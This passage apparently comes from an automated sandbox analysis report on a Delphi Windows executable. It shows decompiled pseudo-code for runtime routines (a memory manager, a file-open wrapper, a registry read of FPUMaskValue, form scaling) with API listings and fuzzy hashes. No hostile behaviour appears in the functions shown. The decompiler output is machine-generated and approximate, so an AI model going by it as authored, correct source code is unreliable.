=  *0x463720; // 0x3a290 								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff); 								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) { 									__eax =  *(__ebx + 0x1a) & 0x0000ffff; 									__edi = __eax; 									__eax = E004016C8(__eax); 									__esi = __eax; 									__eflags = __eax; 									if(__eax != 0) { 										goto L33; 									} else { 										 *0x463718 = __al; 										 *__ebx = __al; 										_pop(__edi); 										_pop(__esi); 										_pop(__ebx); 										return __eax; 									} 								} else { 									__esi =  *0x46371c; // 0x26fa2a0 									__ecx =  *(__ebx + 0x1a) & 0x0000ffff; 									__edx = __ecx + 0xb30; 									__eflags = __edi - __ecx + 0xb30; 									if(__edi >= __ecx + 0xb30) { 										__edi = __ecx; 									} 									__esi = __esi - __edi; 									 *0x463720 =  *0x463720 - __edi; 									 *0x46371c = __esi; 									goto L33; 								} 							} else { 								asm("bsf eax, esi"); 								__esi = __eax * 8; 								__ecx =  *(0x463728 + __eax * 4); 								asm("bsf ecx, ecx"); 								__ecx =  *(0x463728 + __eax * 4) + __eax * 8 * 4; 								__edi = 0x4637a8 + ( *(0x463728 + __eax * 4) + __eax * 8 * 4) * 8; 								__esi =  *(__edi + 4); 								__edx =  *(__esi + 4); 								 *(__edi + 4) = __edx; 								 *__edx = __edi; 								__eflags = __edi - __edx; 								if(__edi == __edx) { 									__edx = 0xfffffffe; 									asm("rol edx, cl"); 									_t38 = 0x463728 + __eax * 4; 									 *_t38 =  *(0x463728 + __eax * 4) & 0xfffffffe; 									__eflags =  *_t38; 									if( *_t38 == 0) { 										asm("btr [0x463724], eax"); 									} 								} 								__edi = 0xfffffff0; 								__edi = 0xfffffff0 &  *(__esi - 4); 								__eflags = 0xfffffff0 - 0x10a60; 								if(0xfffffff0 < 0x10a60) { 									_t52 =  &((__esi - 4)[0xfffffffffffffffc]); 									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7; 									__eflags =  *_t52; 								} else { 									__edx = __edi; 									__edi =  *(__ebx + 0x1a) 
& 0x0000ffff; 									__edx = __edx - __edi; 									__eax = __edi + __esi; 									__ecx = __edx + 3; 									 *(__eax - 4) = __ecx; 									 *(__edx + __eax - 8) = __edx; 									__eax = E004015FC(__eax, __ecx, __edx); 								} 								L33: 								_t56 = __edi + 6; // 0x3a296 								__ecx = _t56; 								 *(__esi - 4) = _t56; 								__eax = 0; 								 *0x463718 = __al; 								 *__esi = __ebx; 								 *((intOrPtr*)(__esi + 8)) = 0; 								 *((intOrPtr*)(__esi + 0xc)) = 1; 								 *(__ebx + 0x10) = __esi; 								_t61 = __esi + 0x20; // 0x26fa2c0 								__eax = _t61; 								__ecx =  *(__ebx + 2) & 0x0000ffff; 								__edx = __ecx + __eax; 								 *(__ebx + 8) = __ecx + __eax; 								__edi = __edi + __esi; 								__edi = __edi - __ecx; 								__eflags = __edi; 								 *(__ebx + 0xc) = __edi; 								 *__ebx = 0; 								 *(__eax - 4) = __esi; 								_pop(__edi); 								_pop(__esi); 								_pop(__ebx); 								return __eax; 							} 						} else { 							_t19 = __edx + 0xc; 							 *_t19 =  *(__edx + 0xc) + 1; 							__eflags =  *_t19; 							 *(__ebx + 8) = __ecx; 							 *__ebx = 0; 							 *(__eax - 4) = __edx; 							_pop(__ebx); 							return __eax; 						} 					} else { 						 *(__edx + 0xc) =  *(__edx + 0xc) + 1; 						__ecx = 0xfffffff8 &  *(__eax - 4); 						__eflags = 0xfffffff8; 						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4); 						 *(__eax - 4) = __edx; 						if(0xfffffff8 == 0) { 							__ecx =  *(__edx + 4); 							 *(__ecx + 0x14) = __ebx; 							 *(__ebx + 4) = __ecx; 							 *__ebx = 0; 							_pop(__ebx); 							return __eax; 						} else { 							 *__ebx = 0; 							_pop(__ebx); 							return __eax; 						} 					} 				} 			}                        

                                                                            0x00401a82
                                                                            0x00401a8a
                                                                            0x00401a8d
                                                                            0x00401a97
                                                                            0x00401a97
                                                                            0x00401a9e
                                                                            0x00401ab1
                                                                            0x00401ab5
                                                                            0x00401abb
                                                                            0x00401ad4
                                                                            0x00401ada
                                                                            0x00401ada
                                                                            0x00401adc
                                                                            0x00401afa
                                                                            0x00401ade
                                                                            0x00401ade
                                                                            0x00401ae3
                                                                            0x00401ae5
                                                                            0x00401aea
                                                                            0x00401af3
                                                                            0x00401af3
                                                                            0x00401aff
                                                                            0x00401b07
                                                                            0x00401abd
                                                                            0x00401abd
                                                                            0x00401ac7
                                                                            0x00401acf
                                                                            0x00000000
                                                                            0x00401acf
                                                                            0x00401aa0
                                                                            0x00401aa3
                                                                            0x00401aa6
                                                                            0x00401b08
                                                                            0x00401b08
                                                                            0x00401b09
                                                                            0x00401b0a
                                                                            0x00401b11
                                                                            0x00401b14
                                                                            0x00401b17
                                                                            0x00401b1a
                                                                            0x00401b1c
                                                                            0x00401b1e
                                                                            0x00401b25
                                                                            0x00401b27
                                                                            0x00401b27
                                                                            0x00401b27
                                                                            0x00401b2e
                                                                            0x00401b30
                                                                            0x00401b30
                                                                            0x00401b2e
                                                                            0x00401b3c
                                                                            0x00401b41
                                                                            0x00401b41
                                                                            0x00401b43
                                                                            0x00401b64
                                                                            0x00401b64
                                                                            0x00401b64
                                                                            0x00401b45
                                                                            0x00401b45
                                                                            0x00401b4b
                                                                            0x00401b4e
                                                                            0x00401b52
                                                                            0x00401b58
                                                                            0x00401b5a
                                                                            0x00401b5a
                                                                            0x00401b58
                                                                            0x00401b6c
                                                                            0x00401b6f
                                                                            0x00401b7b
                                                                            0x00401b7b
                                                                            0x00401a9e
                                                                            0x00401838
                                                                            0x00401838
                                                                            0x0040183a
                                                                            0x00401841
                                                                            0x00401848
                                                                            0x004018a0
                                                                            0x004018a0
                                                                            0x004018a5
                                                                            0x004018a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004018ab
                                                                            0x004018ab
                                                                            0x004018ae
                                                                            0x004018b3
                                                                            0x004018b7
                                                                            0x004018b9
                                                                            0x004018b9
                                                                            0x004018bc
                                                                            0x004018c1
                                                                            0x004018c5
                                                                            0x004018c7
                                                                            0x004018c7
                                                                            0x004018cc
                                                                            0x004018d1
                                                                            0x004018d6
                                                                            0x004018da
                                                                            0x004018e2
                                                                            0x00000000
                                                                            0x004018e2
                                                                            0x004018da
                                                                            0x004018c5
                                                                            0x00000000
                                                                            0x004018b7
                                                                            0x004018a0
                                                                            0x0040184a
                                                                            0x0040184a
                                                                            0x0040184d
                                                                            0x00401850
                                                                            0x00401855
                                                                            0x00401857
                                                                            0x00401870
                                                                            0x00401873
                                                                            0x00401877
                                                                            0x00401879
                                                                            0x0040187c
                                                                            0x004018ec
                                                                            0x004018ed
                                                                            0x004018ee
                                                                            0x004018f5
                                                                            0x004018f7
                                                                            0x004018f7
                                                                            0x004018fc
                                                                            0x00401904
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401908
                                                                            0x0040190d
                                                                            0x00401912
                                                                            0x0040191a
                                                                            0x0040191e
                                                                            0x00000000
                                                                            0x0040191e
                                                                            0x00000000
                                                                            0x0040191a
                                                                            0x004018f7
                                                                            0x00401928
                                                                            0x0040192c
                                                                            0x0040192c
                                                                            0x00401932
                                                                            0x004019a4
                                                                            0x004019a8
                                                                            0x004019ae
                                                                            0x004019b0
                                                                            0x004019d8
                                                                            0x004019dc
                                                                            0x004019de
                                                                            0x004019e3
                                                                            0x004019e5
                                                                            0x004019e7
                                                                            0x00000000
                                                                            0x004019e9
                                                                            0x004019e9
                                                                            0x004019ee
                                                                            0x004019f0
                                                                            0x004019f1
                                                                            0x004019f2
                                                                            0x004019f3
                                                                            0x004019f3
                                                                            0x004019b2
                                                                            0x004019b2
                                                                            0x004019b8
                                                                            0x004019bc
                                                                            0x004019c2
                                                                            0x004019c4
                                                                            0x004019c6
                                                                            0x004019c6
                                                                            0x004019c8
                                                                            0x004019ca
                                                                            0x004019d0
                                                                            0x00000000
                                                                            0x004019d0
                                                                            0x00401934
                                                                            0x00401934
                                                                            0x00401937
                                                                            0x0040193e
                                                                            0x00401945
                                                                            0x00401948
                                                                            0x0040194b
                                                                            0x00401952
                                                                            0x00401955
                                                                            0x00401958
                                                                            0x0040195b
                                                                            0x0040195d
                                                                            0x0040195f
                                                                            0x00401961
                                                                            0x00401966
                                                                            0x00401968
                                                                            0x00401968
                                                                            0x00401968
                                                                            0x0040196f
                                                                            0x00401971
                                                                            0x00401971
                                                                            0x0040196f
                                                                            0x00401978
                                                                            0x0040197d
                                                                            0x00401980
                                                                            0x00401986
                                                                            0x004019f4
                                                                            0x004019f4
                                                                            0x004019f4
                                                                            0x00401988
                                                                            0x00401988
                                                                            0x0040198a
                                                                            0x0040198e
                                                                            0x00401990
                                                                            0x00401993
                                                                            0x00401996
                                                                            0x00401999
                                                                            0x0040199d
                                                                            0x0040199d
                                                                            0x004019f9
                                                                            0x004019f9
                                                                            0x004019f9
                                                                            0x004019fc
                                                                            0x004019ff
                                                                            0x00401a01
                                                                            0x00401a06
                                                                            0x00401a08
                                                                            0x00401a0b
                                                                            0x00401a12
                                                                            0x00401a15
                                                                            0x00401a15
                                                                            0x00401a18
                                                                            0x00401a1c
                                                                            0x00401a1f
                                                                            0x00401a22
                                                                            0x00401a24
                                                                            0x00401a24
                                                                            0x00401a26
                                                                            0x00401a29
                                                                            0x00401a2c
                                                                            0x00401a2f
                                                                            0x00401a30
                                                                            0x00401a31
                                                                            0x00401a32
                                                                            0x00401a32
                                                                            0x0040187e
                                                                            0x0040187e
                                                                            0x0040187e
                                                                            0x0040187e
                                                                            0x00401882
                                                                            0x00401885
                                                                            0x00401888
                                                                            0x0040188b
                                                                            0x0040188c
                                                                            0x0040188c
                                                                            0x00401859
                                                                            0x00401859
                                                                            0x0040185d
                                                                            0x0040185d
                                                                            0x00401860
                                                                            0x00401863
                                                                            0x00401866
                                                                            0x00401890
                                                                            0x00401893
                                                                            0x00401896
                                                                            0x00401899
                                                                            0x0040189c
                                                                            0x0040189d
                                                                            0x00401868
                                                                            0x00401868
                                                                            0x0040186b
                                                                            0x0040186c
                                                                            0x0040186c
                                                                            0x00401866
                                                                            0x00401857

                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,004020BD), ref: 004018CC
                                                                            • Sleep.KERNEL32(0000000A,00000000,?,004020BD), ref: 004018E2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 13f8b92783284f0742b16d58920b8a109701e01874c564de7aff31f642965eb2
                                                                            • Instruction ID: 152e54be863095814fc9e312b9aeabec1b522ad23c6b77915a881c1f34c1aab1
                                                                            • Opcode Fuzzy Hash: 13f8b92783284f0742b16d58920b8a109701e01874c564de7aff31f642965eb2
                                                                            • Instruction Fuzzy Hash: 4DB139F26012919FC715CF29D880316BBE0EB85312F18C27FE4459B3E5E7B89A41CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                            E0041CB80(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) {
                                                                                char _v5;
                                                                                char _v12;
                                                                                char _v16;
                                                                                char _v20;
                                                                                char _v24;
                                                                                char _v28;
                                                                                char _v32;
                                                                                char _v36;
                                                                                char _v40;
                                                                                void* _t29;
                                                                                void* _t65;
                                                                                void* _t66;
                                                                                intOrPtr _t70;
                                                                                intOrPtr _t72;
                                                                                char _t73;
                                                                                intOrPtr _t77;
                                                                                void* _t89;
                                                                                void* _t91;
                                                                                void* _t92;
                                                                                intOrPtr _t93;

                                                                                _t73 = __edx;
                                                                                _t66 = __ecx;
                                                                                _t91 = _t92;
                                                                                _t93 = _t92 + 0xffffffdc;
                                                                                _v36 = 0;
                                                                                _v40 = 0;
                                                                                _v28 = 0;
                                                                                _v32 = 0;
                                                                                if(__edx != 0) {
                                                                                    _t93 = _t93 + 0xfffffff0;
                                                                                    _t29 = E00403C34(_t29, _t91);
                                                                                }
                                                                                _t89 = _t66;
                                                                                _v5 = _t73;
                                                                                _t65 = _t29;
                                                                                _t87 = _a8;
                                                                                _push(_t91);
                                                                                _push(0x41ccc8);
                                                                                _push( *[fs:eax]);
                                                                                 *[fs:eax] = _t93;
                                                                                if(_a8 != 0xffff) {
                                                                                    E0041CA78(E00408D98(_t89, _t87 & 0x0000ffff), 0);
                                                                                    if( *((intOrPtr*)(_t65 + 4)) < 0) {
                                                                                        E00408F58(_t89,  &_v36);
                                                                                        _v24 = _v36;
                                                                                        _v20 = 0xb;
                                                                                        E0040B908(GetLastError(),  &_v40);
                                                                                        _v16 = _v40;
                                                                                        _v12 = 0xb;
                                                                                        _t70 =  *0x462ac0; // 0x416140
                                                                                        E0040C214(_t65, _t70, 1, _t87, _t89, 1,  &_v24);
                                                                                        E00404184();
                                                                                    }
                                                                                } else {
                                                                                    E0041CA78(CreateFileA(E00404C00(_t89), 0xc0000000, 0, 0, "true", 0x80, 0), 0);
                                                                                    if( *((intOrPtr*)(_t65 + 4)) < 0) {
                                                                                        E00408F58(_t89,  &_v28);
                                                                                        _v24 = _v28;
                                                                                        _v20 = 0xb;
                                                                                        E0040B908(GetLastError(),  &_v32);
                                                                                        _v16 = _v32;
                                                                                        _v12 = 0xb;
                                                                                        _t72 =  *0x462f34; // 0x416138
                                                                                        E0040C214(_t65, _t72, 1, _t87, _t89, 1,  &_v24);
                                                                                        E00404184();
                                                                                    }
                                                                                }
                                                                                _t27 = _t65 + 8; // 0x418ad8
                                                                                E00404790(_t27, _t89);
                                                                                _pop(_t77);
                                                                                 *[fs:eax] = _t77;
                                                                                _push(E0041CCCF);
                                                                                return E00404760( &_v40, 4);
                                                                            }

                                                                            0x0041cca8
                                                                            0x0041ccaf
                                                                            0x0041ccb2
                                                                            0x0041ccb5
                                                                            0x0041ccc7

                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CBDC
                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CC0A
                                                                              • Part of subcall function 00408D98: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,00418AD0,0041CC4A,00000000,0041CCC8,?,?,00418AD0), ref: 00408DE6
                                                                              • Part of subcall function 00408F58: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,00418AD0,0041CC65,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 00408F77
                                                                            • GetLastError.KERNEL32(00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CC6F
                                                                              • Part of subcall function 0040B908: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000), ref: 0040B927
                                                                            Strings
                                                                            • 8aA , xrefs: 0041CC27
                                                                            • @aA , xrefs: 0041CC8C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                            • String ID: 8aA$@aA
                                                                            • API String ID: 503785936-2183923460
                                                                            • Opcode ID: 74cf7b3b09367aa19a362bd8889190725437025edc70dae0b50c2eeb363540cb
                                                                            • Instruction ID: 81cf5405ad412fc3c3ed94fa8eb2254e93a3cb41c3525e5490fe9ad35a09f5bb
                                                                            • Opcode Fuzzy Hash: 74cf7b3b09367aa19a362bd8889190725437025edc70dae0b50c2eeb363540cb
                                                                            • Instruction Fuzzy Hash: 4B31D670A002089FDB00EBA5CD827DEBBF5AB49304F50807EE504B73C1D7799D048BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 63%
                                                                            E00403728() {
                                                                                void* _v8;
                                                                                char _v12;
                                                                                int _v16;
                                                                                signed short _t14;
                                                                                intOrPtr _t27;
                                                                                void* _t29;
                                                                                void* _t31;
                                                                                intOrPtr _t32;

                                                                                _t29 = _t31;
                                                                                _t32 = _t31 + 0xfffffff4;
                                                                                _v12 =  *0x461020 & 0x0000ffff;
                                                                                if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                    _t14 =  *0x461020 & 0xffc0 | _v12 & 0x3f;
                                                                                    *0x461020 = _t14;
                                                                                    return _t14;
                                                                                } else {
                                                                                    _push(_t29);
                                                                                    _push(E00403799);
                                                                                    _push( *[fs:eax]);
                                                                                    *[fs:eax] = _t32;
                                                                                    _v16 = 4;
                                                                                    RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                    _pop(_t27);
                                                                                    *[fs:eax] = _t27;
                                                                                    _push(0x4037a0);
                                                                                    return RegCloseKey(_v8);
                                                                                }
                                                                            }


                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040374A
                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403799,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040377D
                                                                            • RegCloseKey.ADVAPI32(?,004037A0,00000000,?,00000004,00000000,00403799,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403793
                                                                            Strings
                                                                            • FPUMaskValue , xrefs: 00403774
                                                                            • SOFTWARE\Borland\Delphi\RTL , xrefs: 00403740
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                            • API String ID: 3677997916-4173385793
                                                                            • Opcode ID: 6e38f76dad574c301ae7063cc0567989a2d3d7df9236b8b50364baff86729d8e
                                                                            • Instruction ID: 905e6c10af62dac64c3e9582eb7401ad952ea0fe5c189a7c1f175b7203d1f33b
                                                                            • Opcode Fuzzy Hash: 6e38f76dad574c301ae7063cc0567989a2d3d7df9236b8b50364baff86729d8e
                                                                            • Instruction Fuzzy Hash: C701B5B9914348BAEB11DF918C42BB977BCEB48B01F104477F904F79D0E6789A10C65D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
                                                                                                                                  E0044E9D8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) { 				intOrPtr* _v8; 				int _t103; 				int _t105; 				intOrPtr _t122; 				int _t127; 				intOrPtr _t163; 				signed char _t172; 				void* _t174; 				intOrPtr _t192; 				intOrPtr _t205; 				void* _t208; 				void* _t210; 				int _t211; 				intOrPtr _t215; 				void* _t217; 				signed char _t218;  				_t208 = __edi; 				_t214 = _t215; 				_t210 = __edx; 				_v8 = __eax; 				E0043E310(_v8); 				_push(_t215); 				_push(0x44ec56); 				_push( *[fs:edx]); 				 *[fs:edx] = _t215; 				 *(_v8 + 0x2b0) = 0; 				 *(_v8 + 0x2b4) = 0; 				 *(_v8 + 0x2b8) = 0; 				_t174 = 0; 				_t217 = E004038B4( *_v8) -  *0x44b604; // 0x44b650 				if(_t217 == 0) { 					_t172 =  *0x4657f5 & 0x000000ff ^ 0x00000001; 					_t218 = _t172; 					 *(_v8 + 0x27c) = _t172; 				} 				E0043D938(_v8, _t174, _t210, _t218); 				if( *(_v8 + 0x2a4) == 0 ||  *(_v8 + 0x2b8) <= 0) { 					L14: 					_t103 =  *(_v8 + 0x2b0); 					_t227 = _t103; 					if(_t103 > 0) { 						E0043A3B0(_v8, _t103, _t227); 					} 					_t105 =  *(_v8 + 0x2b4); 					_t228 = _t105; 					if(_t105 > 0) { 						E0043A3F4(_v8, _t105, _t228); 					} 					 *(_v8 + 0x8c) =  *0x44ec64 & 0x000000ff; 					_t229 = _t174; 					if(_t174 == 0) { 						E0044DFB0(_v8, 1, 1); 						E00441EB0(_v8, 1, 1, _t229); 					} 					E0043BC9C(_v8, 0, 0xb03d, 0); 					_pop(_t192); 					 *[fs:eax] = _t192; 					_push(0x44ec5d); 					return E0043E318(_v8); 				} else { 					if(( *(_v8 + 0x8c) & 0x00000010) != 0) { 						_t205 =  *0x466584; // 0x27c66a0 						if( *(_v8 + 0x2a4) !=  *((intOrPtr*)(_t205 + 0x40))) { 							_t163 =  *0x466584; // 0x27c66a0 							E00425B74( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00425B6C( *((intOrPtr*)(_v8 + 0x68))),  *(_t163 + 0x40),  *(_v8 + 0x2a4)), _t208, _t214); 						} 					} 					_t122 =  *0x466584; // 
0x27c66a0 					 *(_v8 + 0x2a4) =  *(_t122 + 0x40); 					_t211 = E0044EDC4(_v8); 					_t127 =  *(_v8 + 0x2b8); 					_t223 = _t211 - _t127; 					if(_t211 != _t127) { 						_t174 = 1; 						E0044DFB0(_v8, _t127, _t211); 						E0043A4D8(_v8,  *(_v8 + 0x2b8), _t211); 						E00441EB0(_v8,  *(_v8 + 0x2b8), _t211, _t223); 						if(( *(_v8 + 0x8c) & 0x00000004) != 0) { 							 *(_v8 + 0x2b0) = MulDiv( *(_v8 + 0x2b0), _t211,  *(_v8 + 0x2b8)); 						} 						if(( *(_v8 + 0x8c) & 0x00000008) != 0) { 							 *(_v8 + 0x2b4) = MulDiv( *(_v8 + 0x2b4), _t211,  *(_v8 + 0x2b8)); 						} 						if(( *(_v8 + 0x8c) & 0x00000020) != 0) { 							 *(_v8 + 0x242) = MulDiv( *(_v8 + 0x242), _t211,  *(_v8 + 0x2b8)); 							 *(_v8 + 0x246) = MulDiv( *(_v8 + 0x246), _t211,  *(_v8 + 0x2b8)); 						} 					} 					goto L14; 				} 			}                        


                                                                            APIs
                                                                            • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044EAAB
                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB3A
                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB69
                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EB98
                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044EBBB
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7c06df506918b2a8084eeb7c404449d434ecfeb24f2213037839e8fb0ff35c84
                                                                            • Instruction ID: 21f30903740b1ce47e0213c7038e8d86d6add3c7edb827e050f75d84db499a4c
                                                                            • Opcode Fuzzy Hash: 7c06df506918b2a8084eeb7c404449d434ecfeb24f2213037839e8fb0ff35c84
                                                                            • Instruction Fuzzy Hash: 7081B574A00154EFDB40DB9AC589E9EB7F9BF49304F2541FAA808DB362CB74AE409B54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                                                                                  E00401B88(void* __eax, void* __edi) { 				signed int __ebx; 				void* _t50; 				signed int _t51; 				signed int _t52; 				signed int _t54; 				void _t57; 				int _t58; 				signed int _t65; 				void* _t67; 				signed int _t69; 				intOrPtr _t70; 				signed int _t75; 				signed int _t76; 				signed int _t77; 				void* _t79; 				void* _t82; 				void _t85; 				void* _t87; 				void* _t89;  				_t48 = __eax; 				_t77 =  *(__eax - 4); 				_t65 =  *0x46304d; // 0x0 				if((_t77 & 0x00000007) != 0) { 					__eflags = _t77 & 0x00000005; 					if((_t77 & 0x00000005) != 0) { 						_pop(_t65); 						__eflags = _t77 & 0x00000003; 						if((_t77 & 0x00000003) != 0) { 							return 0xffffffff; 						} else { 							_push(_t65); 							_t67 = __eax - 0x10; 							E00401740(); 							_t50 = _t67; 							_t85 =  *_t50; 							_t82 =  *(_t50 + 4); 							_t51 = VirtualFree(_t67, 0, 0x8000); 							if(_t51 == 0) { 								_t52 = _t51 | 0xffffffff; 								__eflags = _t52; 							} else { 								 *_t82 = _t85; 								 *(_t85 + 4) = _t82; 								_t52 = 0; 							} 							 *0x4657a8 = 0; 							return _t52; 						} 					} else { 						goto L21; 					} 				} else { 					__eflags = __bl; 					__ebx =  *__edx; 					if(__eflags != 0) { 						while(1) { 							__eax = 0x100; 							asm("lock cmpxchg [ebx], ah"); 							if(__eflags == 0) { 								goto L6; 							} 							Sleep(0); 							__edx = __edx; 							__ecx = __ecx; 							__eax = 0x100; 							asm("lock cmpxchg [ebx], ah"); 							if(__eflags != 0) { 								Sleep(0xa); 								__edx = __edx; 								__ecx = __ecx; 								continue; 							} 							goto L6; 						} 					} 					L6: 					_t6 = __edx + 0xc; 					 *_t6 =  *(__edx + 0xc) - 1; 					__eflags =  *_t6; 					__eax =  *(__edx + 8); 					if( *_t6 == 0) { 						__eflags = __eax; 						if(__eax == 0) { 							L12: 							 *(__ebx + 0xc) = __eax; 						} 
else { 							__eax =  *(__edx + 0x14); 							__ecx =  *(__edx + 4); 							 *(__eax + 4) = __ecx; 							 *(__ecx + 0x14) = __eax; 							__eax = 0; 							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx; 							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) { 								goto L12; 							} 						} 						 *__ebx = __al; 						__eax = __edx; 						__edx =  *(__edx - 4); 						__bl =  *0x46304d; // 0x0 						L21: 						__eflags = _t65; 						_t69 = _t77 & 0xfffffff0; 						_push(_t84); 						_t87 = _t48; 						if(__eflags != 0) { 							while(1) { 								_t54 = 0x100; 								asm("lock cmpxchg [0x463718], ah"); 								if(__eflags == 0) { 									goto L22; 								} 								Sleep(0); 								_t54 = 0x100; 								asm("lock cmpxchg [0x463718], ah"); 								if(__eflags != 0) { 									Sleep(0xa); 									continue; 								} 								goto L22; 							} 						} 						L22: 						__eflags = (_t87 - 4)[_t69] & 0x00000001; 						_t75 = (_t87 - 4)[_t69]; 						if(((_t87 - 4)[_t69] & 0x00000001) != 0) { 							_t54 = _t69 + _t87; 							_t76 = _t75 & 0xfffffff0; 							_t69 = _t69 + _t76; 							__eflags = _t76 - 0xb30; 							if(_t76 >= 0xb30) { 								_t54 = E004015BC(_t54); 							} 						} else { 							_t76 = _t75 | 0x00000008; 							__eflags = _t76; 							(_t87 - 4)[_t69] = _t76; 						} 						__eflags =  *(_t87 - 4) & 0x00000008; 						if(( *(_t87 - 4) & 0x00000008) != 0) { 							_t76 =  *(_t87 - 8); 							_t87 = _t87 - _t76; 							_t69 = _t69 + _t76; 							__eflags = _t76 - 0xb30; 							if(_t76 >= 0xb30) { 								_t54 = E004015BC(_t87); 							} 						} 						__eflags = _t69 - 0x13fff0; 						if(_t69 == 0x13fff0) { 							__eflags =  *0x463720 - 0x13fff0; 							if( *0x463720 != 0x13fff0) { 								_t70 = _t87 + 0x13fff0; 								E0040165C(_t54); 								 *((intOrPtr*)(_t70 - 4)) = 2; 								 *0x463720 = 0x13fff0; 								 *0x46371c = _t70; 								 *0x463718 = 0; 								__eflags = 0; 								return 0; 							} else { 								_t89 = _t87 - 0x10; 								_t57 
